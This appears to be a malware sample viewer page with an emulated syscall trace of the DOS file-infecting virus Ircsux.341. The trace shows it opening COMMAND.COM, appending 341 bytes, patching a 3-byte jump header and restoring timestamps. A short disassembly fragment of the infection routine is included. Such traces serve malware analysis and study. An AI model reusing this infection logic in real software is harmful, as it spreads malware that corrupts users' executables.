Sample viewer

vx.netlux.org/Virus.DOS.Ircsux.341

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:20.664170895Z 47 PC: 12aae | Get disk transfer address
2018-12-17T23:01:20.665603687Z 26 PC: 12abe | Set disk transfer address
2018-12-17T23:01:20.667032542Z 25 PC: 12acb | Get default drive
2018-12-17T23:01:20.66805307Z 14 PC: 12ad4 | Set default drive (Drive = 'C')
2018-12-17T23:01:20.669190537Z 78 PC: 12ae0 | Find first file
2018-12-17T23:01:20.674554406Z 67 PC: 12b1d | Get or set file attributes
2018-12-17T23:01:20.67905845Z 67 PC: 12b29 | Get or set file attributes
2018-12-17T23:01:21.09746179Z 61 PC: 12b31 | Open file (Filename = 'COMMAND.COM')
2018-12-17T23:01:21.106093869Z 87 PC: 12b38 | Get or set file date and time
2018-12-17T23:01:21.108083057Z 44 PC: 12b44 | Get time 0x12b44: or dx, dx
0x12b46: je 0x12b40
0x12b48: mov word ptr [bp + 0x14e], dx
0x12b4c: mov ah, 0x3f
0x12b4e: lea dx, word ptr [bp + 0x63]
0x12b51: mov cx, 3
0x12b54: int 0x21
0x12b56: mov ax, 0x4202
0x12b59: xor cx, cx
0x12b5b: xor dx, dx
0x12b5d: int 0x21
0x12b5f: sub ax, 3
0x12b62: mov word ptr [0xfb2d], ax
0x12b65: mov byte ptr [0xfb2c], 0xe9
0x12b6a: lea si, word ptr [bp - 3]
0x12b6d: mov di, 0xfcbc
0x12b70: mov cx, 0x155
0x12b73: cld
0x12b74: rep movsb byte ptr es:[di], byte ptr [si]
0x12b76: mov si, 0xfcd8
2018-12-17T23:01:21.113403815Z 63 PC: 12b56 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:01:21.118032302Z 66 PC: 12b5f | Move file pointer
2018-12-17T23:01:21.120596791Z 64 PC: 12b86 | Write file or device (Write 341 bytes on handle 5)
2018-12-17T23:01:21.130751713Z 66 PC: 12b8f | Move file pointer
2018-12-17T23:01:21.132889951Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:01:21.137827178Z 87 PC: 12bac | Get or set file date and time
2018-12-17T23:01:21.140144943Z 62 PC: 12bb0 | Close file
2018-12-17T23:01:21.148013959Z 67 PC: 12bbc | Get or set file attributes
2018-12-17T23:01:21.161887258Z 26 PC: 12bc9 | Set disk transfer address
2018-12-17T23:01:21.163598954Z 14 PC: 12bd2 | Set default drive (Drive = 'A')
2018-12-17T23:01:21.165444232Z 9 PC: 12a47 | Display string (String= 'IT'S HARD DROPPER - (C) 1994 by ?')